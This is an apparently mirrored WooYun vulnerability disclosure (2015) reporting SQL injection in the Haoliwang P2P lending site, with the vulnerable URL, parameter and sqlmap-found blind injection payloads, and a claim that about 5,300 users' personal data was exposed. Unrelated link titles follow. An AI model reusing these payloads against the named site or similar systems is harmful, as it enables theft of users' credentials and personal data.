P2P之好利网SQL注入泄露数万用户信息

发表于 2015年07月01日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0123779

漏洞标题：P2P之好利网SQL注入泄露数万用户信息

相关厂商：好利网

漏洞作者：Me_Fortune

提交时间：2015-07-01 10:52

公开时间：2015-08-15 10:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：

漏洞详情

披露状态：

2015-07-01: 积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-15: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

泄露用户名，登陆密码，手机号，家庭住址，等等等，能泄露的都泄露了。5300个用户

详细说明：

1、

http://m.haolyy.com/web/showmember/appcatview?categoryId1=10

1	http://m.haolyy.com/web/showmember/appcatview?categoryId1=10

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:<br>
---<br>
Parameter: categoryId1 (GET)<br>
    Type: boolean-based blind<br>
    Title: AND boolean-based blind - WHERE or HAVING clause<br>
    Payload: categoryId1=10 AND 6535=6535Type: AND/OR time-based blind<br>
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br>
    Payload: categoryId1=10 AND (SELECT * FROM (SELECT(SLEEP(5)))KDEs)<br>
---<br>
web application technology: JSP<br>
back-end DBMS: MySQL 5.0.12

1

2

3

4

5

6

7

8

9

10

11

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:<br>

---<br>

Parameter: categoryId1 (GET)<br>

Type: boolean-based blind<br>

Title: AND boolean-based blind - WHERE or HAVING clause<br>

Payload: categoryId1=10 AND 6535=6535Type: AND/OR time-based blind<br>

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br>

Payload: categoryId1=10 AND (SELECT * FROM (SELECT(SLEEP(5)))KDEs)<br>

---<br>

web application technology: JSP<br>

back-end DBMS: MySQL 5.0.12

2、数据库

3、数据量

4、

漏洞证明：

修复方案：

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

评价

2010-01-01 00:00 侦探911 白帽子 | Rank:74 漏洞数:8)
ˊ_>ˋ
2010-01-01 00:00 Me_Fortune 白帽子 | Rank:144 漏洞数:18)
@侦探911 大牛你好

原文连接：P2P之好利网SQL注入泄露数万用户信息 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

人人网某处SQL注入影响大量数据

人人网某处SQL注入影响大量数据

乌云某处逻辑错误导致越权

广州市农商行源码泄露（不少证件证和照片）

广州市农商行源码泄露（不少证件证和照片）

北京一路热点(16wifi)主要系统存安全漏洞可Getshell/root权限

北京一路热点(16wifi)主要系统存安全漏洞可Getshell/root权限

万惠金融PPmoney平台存在SQl注入（可能涉及敏感数据）

万惠金融PPmoney平台存在SQl注入（可能涉及敏感数据）

Discuz门户权限SSRF

16wifi某第三方系统从爆破用户到四台终端命令执行/涉及主干等多个项目源码

16wifi某第三方系统从爆破用户到四台终端命令执行/涉及主干等多个项目源码

ChinaCache某系统JBoss配置不当导致Getshell

ChinaCache某系统JBoss配置不当导致Getshell

The iOS Simulator deployment target is set to 4.3解决

The iOS Simulator deployment target is set to 4.3解决

更新Xcode提示空间不足“Not enough free space”解决

更新Xcode提示空间不足“Not enough free space”解决

'AMapSearch-NO-IDFA' uses the unencrypted 'http' protocol to transfer the Pod解决

'AMapSearch-NO-IDFA' uses the unencrypted 'http' protocol to transfer the Pod解决

Automatically assigning platform `ios` with version `9.0` on target `Runner`解决

Automatically assigning platform `ios` with version `9.0` on target `Runner`解决

Flutter: Error running pod install解决

Flutter: Error running pod install解决

Flutter隐藏控件Offstage/Visibility/Opacity/ifelse

Flutter隐藏控件Offstage/Visibility/Opacity/ifelse

ThinkPHP3.x注入漏洞

ThinkPHP3.x注入漏洞

app-ads.txt 问题您的一个或多个应用的 app-ads.txt 实施有问题

app-ads.txt 问题您的一个或多个应用的 app-ads.txt 实施有问题